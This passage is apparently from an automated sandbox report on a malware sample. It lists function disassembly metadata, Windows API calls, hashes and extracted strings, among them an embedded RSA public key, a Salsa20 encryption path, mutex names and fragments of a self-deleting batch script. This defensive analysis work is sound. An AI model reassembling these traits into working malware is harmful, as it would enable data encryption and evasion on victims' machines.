                                                                                                                                                                        • Opcode Fuzzy Hash: b2173d9b2c520376c5ceb4e3f535ce2bfc9c8594a0f8d5ceb16ad0e93a327654
                                                                                                                                                                        • Instruction Fuzzy Hash: 5EE0C2311143046AD7219764CC01B82BBC89F19724F00C819E38A6B9C1C5A1B00487A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00303B43 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00303B64
                                                                                                                                                                          • Part of subcall function 00300C62: __FF_MSGBANNER.LIBCMT ref: 00300C79
                                                                                                                                                                          • Part of subcall function 00300C62: __NMSG_WRITE.LIBCMT ref: 00300C80
                                                                                                                                                                          • Part of subcall function 00300C62: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001,00000000,00000000,00000000,?,00308CF4,00000000,00000000,00000000,00000000,?,00308BE1,00000018,003E7BD0), ref: 00300CA5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 501242067-0
                                                                                                                                                                        • Opcode ID: d91b26295a65e475b98060f5461b6284b3f94265a03b2742eb985717fa1bea6a
                                                                                                                                                                        • Instruction ID: fc5aa1dca4f2301e687ea2584384f47b5704e6baf68e4a8fbfe9d846033c4b69
                                                                                                                                                                        • Opcode Fuzzy Hash: d91b26295a65e475b98060f5461b6284b3f94265a03b2742eb985717fa1bea6a
                                                                                                                                                                        • Instruction Fuzzy Hash: 78D0222494A48A9BFF237B3D88639A8BF2CDE03224B1007D9EC898D8D3CD114465CB82
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002FFDC0 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00409230), ref: 002FFDD6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                        • Opcode ID: fdab318973ce7fd48512536ea969ed4fb935af078c1890dfb92ede9dd5af327f
                                                                                                                                                                        • Instruction ID: a074e3e03d0ef4847b53aab5c5295aae6ee2c6662e3969b3e6c062118eb2a72c
                                                                                                                                                                        • Opcode Fuzzy Hash: fdab318973ce7fd48512536ea969ed4fb935af078c1890dfb92ede9dd5af327f
                                                                                                                                                                        • Instruction Fuzzy Hash: 5DD0A93138830937E3000BA4AD03F093A888B1AB00F00803AB204E81E1DAB1A8208A1D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003020B6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __fsopen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3646066109-0
                                                                                                                                                                        • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                                                                        • Instruction ID: eb67e282e1e11ff02c84810a406c90951566c9813943b38728a8b87801d66021
                                                                                                                                                                        • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                                                                                        • Instruction Fuzzy Hash: 1FB0927244020C77CF022E82EC02A493B199B50760F048020FB0C1C1A1E6B7E6649689
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00300FDD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __wfsopen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 197181222-0
                                                                                                                                                                        • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                                                                        • Instruction ID: 29dec3b2815009e5c79225e658c4cf50a420eae8ffb5ba0617c33c0c720e148b
                                                                                                                                                                        • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                                                                        • Instruction Fuzzy Hash: F7B092B244020C77CE022A82EC02A493B1DAB417A0F008020FB0C1C1A1A673A6A09A89
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F2900 Relevance: 1.3, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,?,?), ref: 002F2966
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 626452242-0
                                                                                                                                                                        • Opcode ID: b1f687713add8e2c04a4e943024ee20970f9d4e30cc7a53c843d8065eb3e3058
                                                                                                                                                                        • Instruction ID: f2aa00fecc3a06ee818313fca29782627a033f61e254ad8efd2ec6651ce3c022
                                                                                                                                                                        • Opcode Fuzzy Hash: b1f687713add8e2c04a4e943024ee20970f9d4e30cc7a53c843d8065eb3e3058
                                                                                                                                                                        • Instruction Fuzzy Hash: C711E131901219EBDB01DF59CC51BEFFBA8EF06754F004129F918A7280C7BA9915CBD6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 002F9E70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7, xrefs: 002F9EC4
                                                                                                                                                                        • p2?, xrefs: 002F9EE2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                        • String ID: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7$p2?
                                                                                                                                                                        • API String ID: 2102423945-3049354308
                                                                                                                                                                        • Opcode ID: 71ae469202670da77636b892c9cec395a370c1ce29d4b0bbee565977033f428a
                                                                                                                                                                        • Instruction ID: ec0386afbabe5a5b86fba15233fbb76875e009f852eb8429e05e296c67c010d3
                                                                                                                                                                        • Opcode Fuzzy Hash: 71ae469202670da77636b892c9cec395a370c1ce29d4b0bbee565977033f428a
                                                                                                                                                                        • Instruction Fuzzy Hash: 1BF06D7028974475F3126750FD17B253A91A314B08F500898E2482E2F3D3F92348939E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003182A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00318568,?,00000000), ref: 003182E6
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00318568,?,00000000), ref: 00318310
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                        • Opcode ID: 50f1a044e3237078522b77fcd0e1ece8111f6b0c1041fe1f0068709ca449d13c
                                                                                                                                                                        • Instruction ID: 071c8fcc41713f9ff4a711ca6d9a1b18b65b1025d06035e219e097c157fcfde0
                                                                                                                                                                        • Opcode Fuzzy Hash: 50f1a044e3237078522b77fcd0e1ece8111f6b0c1041fe1f0068709ca449d13c
                                                                                                                                                                        • Instruction Fuzzy Hash: A7019235204505AADB2B9F59DC05FDA379CAF09B60F058815F604DB491EF70DAC2C7D8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EC070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 002EC090
                                                                                                                                                                        • input != nullptr && output != nullptr, xrefs: 002EC095
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __wassert
                                                                                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                                                                                        • Opcode ID: 0439b6fa353e85df8dd13dda7f14677631e9b0122cbe86f2506bf1754d3f2b27
                                                                                                                                                                        • Instruction ID: 2b6a2675275c68b7565f7523893659c8a5d872ad5c6bb32c5111b5b522a33870
                                                                                                                                                                        • Opcode Fuzzy Hash: 0439b6fa353e85df8dd13dda7f14677631e9b0122cbe86f2506bf1754d3f2b27
                                                                                                                                                                        • Instruction Fuzzy Hash: 1AC18BB5E003499FCB54CFA9C885ADEFBF1FF48300F64856AE919E7201E334AA558B54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F24E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 002F24FE
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002F2509
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 002F251C
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 002F2539
                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 002F2550
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002F255B
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 002F256E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                        • API String ID: 2372642624-488272950
                                                                                                                                                                        • Opcode ID: a5d686a38457f53882103d277b7409c989cc6dcda0032e1f200d96689da26974
                                                                                                                                                                        • Instruction ID: a08ce6b20836a69c8166f51167dcb2811ea17b3a671f3cf6779ce846e44878b9
                                                                                                                                                                        • Opcode Fuzzy Hash: a5d686a38457f53882103d277b7409c989cc6dcda0032e1f200d96689da26974
                                                                                                                                                                        • Instruction Fuzzy Hash: F471417295021CAADF11DBE1DC89FEA77BCFB45301F4006A6F609D2090DB759A88CF61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F1900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002F1915
                                                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 002F1932
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 002F1941
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 002F1948
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 002F1956
                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 002F1962
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 002F1974
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 002F198B
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,003E0260), ref: 002F1993
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 002F1999
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 002F19A3
                                                                                                                                                                        • _memset.LIBCMT ref: 002F19B8
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 002F19DC
                                                                                                                                                                          • Part of subcall function 002F2BA0: lstrlenW.KERNEL32(?), ref: 002F2BC9
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 002F1A01
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 002F1A04
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                                                                        • String ID: failed with error
                                                                                                                                                                        • API String ID: 4182478520-946485432
                                                                                                                                                                        • Opcode ID: 021016a04837d590a9cdf86677690381e8f8245a1eaec75e4ed402f13be17a58
                                                                                                                                                                        • Instruction ID: 47691937740e0bff275a0a325e30032e823909ffcf22127f452d6458fe11a529
                                                                                                                                                                        • Opcode Fuzzy Hash: 021016a04837d590a9cdf86677690381e8f8245a1eaec75e4ed402f13be17a58
                                                                                                                                                                        • Instruction Fuzzy Hash: 00210431A50218F7E7126BA18C4AFBE7A7CEB86B50F100024FB01B61D0CAB42D519FE5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003622E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 003349A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00334B72), ref: 003349C7
                                                                                                                                                                          • Part of subcall function 003349A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 003349D7
                                                                                                                                                                          • Part of subcall function 003349A0: GetDesktopWindow.USER32 ref: 003349FB
                                                                                                                                                                          • Part of subcall function 003349A0: GetProcessWindowStation.USER32(?,00334B72), ref: 00334A01
                                                                                                                                                                          • Part of subcall function 003349A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00334B72), ref: 00334A1C
